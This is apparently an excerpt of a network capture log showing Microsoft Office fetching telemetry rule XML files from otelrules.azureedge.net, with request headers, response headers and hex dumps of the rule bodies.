                                                                                                                                      2024-10-07 01:23:08 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      72192.168.2.44980913.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:08 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:08 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 474
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                      ETag: "0x8DC582BA4037B0D"
                                                                                                                                      x-ms-request-id: 3b7b7106-501e-0064-43e7-161f54000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012308Z-1657d5bbd48gqrfwecymhhbfm800000001kg00000000gy4x
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:09 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      73192.168.2.44981313.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:09 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:09 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 405
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                      ETag: "0x8DC582B942B6AFF"
                                                                                                                                      x-ms-request-id: dfb96d6a-f01e-003f-17e5-16d19d000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012309Z-1657d5bbd48dfrdj7px744zp8s00000002e000000000scv0
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:09 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      74192.168.2.44981213.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:09 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:09 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 472
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                      ETag: "0x8DC582B984BF177"
                                                                                                                                      x-ms-request-id: 2f576d96-401e-0047-3902-178597000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012309Z-1657d5bbd4824mj9d6vp65b6n4000000032g000000003ksm
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:09 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      75192.168.2.44981113.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:09 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:09 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 419
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                      ETag: "0x8DC582BA6CF78C8"
                                                                                                                                      x-ms-request-id: f196d52c-b01e-0002-1604-171b8f000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012309Z-1657d5bbd48vhs7r2p1ky7cs5w000000030000000000tqpt
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:09 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      76192.168.2.44981413.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:09 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:09 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 468
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                      ETag: "0x8DC582BBA642BF4"
                                                                                                                                      x-ms-request-id: f5ee0945-901e-0083-4202-17bb55000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012309Z-1657d5bbd482lxwq1dp2t1zwkc00000002ng000000000srm
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:09 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      77192.168.2.44981513.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:09 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:09 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 174
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                      ETag: "0x8DC582B91D80E15"
                                                                                                                                      x-ms-request-id: 0607cd43-401e-0078-1b00-174d34000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012309Z-1657d5bbd48wd55zet5pcra0cg00000002qg00000000m3zc
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:09 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      78192.168.2.44981613.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:10 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:10 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:10 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1952
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                      ETag: "0x8DC582B956B0F3D"
                                                                                                                                      x-ms-request-id: a5ff6bd9-301e-005d-3af2-16e448000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012310Z-1657d5bbd48qjg85buwfdynm5w00000002x0000000009d81
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:10 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      79192.168.2.44981713.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:10 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:10 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 958
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                      ETag: "0x8DC582BA0A31B3B"
                                                                                                                                      x-ms-request-id: 0c165d1d-a01e-000d-7dfe-16d1ea000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012310Z-1657d5bbd48vlsxxpe15ac3q7n00000002q000000000m87h
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:10 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      80192.168.2.44981913.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:10 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:10 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:10 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 2592
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                      ETag: "0x8DC582BB5B890DB"
                                                                                                                                      x-ms-request-id: 33b4d0ae-a01e-0032-35ff-161949000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012310Z-1657d5bbd48xlwdx82gahegw40000000031g0000000056wy
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:10 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      81192.168.2.44981813.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:10 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:10 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 501
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                      ETag: "0x8DC582BACFDAACD"
                                                                                                                                      x-ms-request-id: c2f609cb-201e-0003-75fd-16f85a000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012310Z-1657d5bbd48wd55zet5pcra0cg00000002qg00000000m40h
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
